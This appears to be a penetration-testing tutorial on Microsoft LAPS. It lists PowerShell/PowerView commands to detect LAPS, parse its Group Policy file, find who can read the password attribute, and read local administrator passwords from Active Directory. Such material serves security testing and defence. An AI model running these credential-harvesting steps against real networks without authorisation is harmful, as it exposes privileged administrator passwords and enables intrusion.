LAPS
Introduction
Local Administrator Password Solution (LAPS) is a Microsoft tool that helps organizations secure their local administrator accounts on Windows-based computers. It provides a unique, randomly generated password for each local administrator account on every managed computer in an organization's network, and stores the password securely in Active Directory.
Enumeration
There are three main ways to check if LAPS is enabled on the machine you have access to.
Check if AdmPwd.dll exists on the system.
dir "C:\Program Files\LAPS\CSE"
Check for GPOs related to "LAPS".
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
Check if the attribute ms-Mcs-AdmPwdExpirationTime is not null on any computer object.
Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
Exploitation
1. Download the Registry.pol, whose location is the GPCFileSysPath obtained while enumerating GPOs.
ls <GPCFileSysPath>\Machine\Registry.pol
2. Parse the file with the following command from the GPRegistryPolicyParser module.
Parse-PolFile .\Desktop\Registry.pol
After parsing the file, you can obtain the following information:
Password complexity is upper, lower and numbers.
Password length is 14.
Passwords are changed every 30 days.
The LAPS managed account name is LapsAdmin.
Password expiration protection is disabled.
3. Next, find out who can read the LAPS password. There are two alternatives.
Directly inspecting the computer objects' ACLs
# Obtain the SID
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
# Convert the SID
ConvertFrom-SID <SecurityIdentifier>
Using the LAPSToolkit.
. .\LAPSToolkit.ps1
Find-LAPSDelegatedGroups
4. Once you have permission to read the password, you can read it as follows.
Get-DomainComputer -Identity <HOSTNAME> -Properties ms-Mcs-AdmPwd